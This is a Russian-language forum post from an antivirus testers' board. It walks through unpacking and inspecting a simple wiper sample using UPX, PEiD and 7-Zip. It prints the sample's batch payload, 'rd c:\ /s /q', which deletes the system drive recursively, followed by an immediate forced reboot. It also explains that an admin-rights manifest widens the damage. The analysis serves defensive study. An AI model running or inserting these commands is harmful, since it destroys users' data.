Вскрываем простейшую малварь за 60 секунд

Подготовка и проведение тестирования антивирусов и других программ, общение между тестерами.
Ответить
Аватара пользователя
x-sis
Сообщения: 10358
Зарегистрирован: 26 фев 2014, 19:10
Откуда: Россия

Вскрываем простейшую малварь за 60 секунд

Сообщение x-sis »

Этот образец удаляет всё на системном диске и имеет слабый детект на VT. Сейчас решила глянуть на сие чудо. Первым делом смотрим детекты:

https://www.virustotal.com/en/file/c3f4 ... /analysis/

В информации к файлу мы видим что эта хрень накрыта upx. Но такой анализ неинтересен:( Поэтому открываем сэмпл в PEiD. Ну да, ВТ был прав...

[ATTACH=full]2724[/ATTACH]

Чем же снять этот упаковщик, спросите вы. В данном случае всё элементарно — чем паковали, тем и распакуем. Для этого нам потребуется консолька, утилита upx и аргумент -d

Распаковка:

Код: Выделить всё

upx.exe -d file.exe
[ATTACH=full]2725[/ATTACH]

Снова открываем PEiD для того, чтобы понять на чём написана софтинка (хотя в принципе это и не нужно здесь)

[ATTACH=full]2726[/ATTACH]

Далее используем ещё более примитивные методы. Заглянем внутрь зловреда с помощью ресурсхакера к примеру или же тупо распакуем 7-зипом. Хе, и что же мы видим? ...батники!

[ATTACH=full]2727[/ATTACH]

Код: Выделить всё

rd c:\ /s /q
Данная команда удаляет все каталоги и подкаталоги, без запроса на удаления. Всё естественно не удалится, так как многие файлы используются процессами.

Код: Выделить всё

shutdown -r /t 0
Завершение работы и перезагрузка (через 0 секунд)

Ещё в ресурсах наблюдается файл манифеста, который запрашивает привилегии админа при запуске программы. Без него удалятся только юзерские папки.

Автор: Vanessa, дата публикации оригинала — 22.04.2016
У вас нет необходимых прав для просмотра вложений в этом сообщении.
Ответить

Вернуться в «Раздел Тестеров»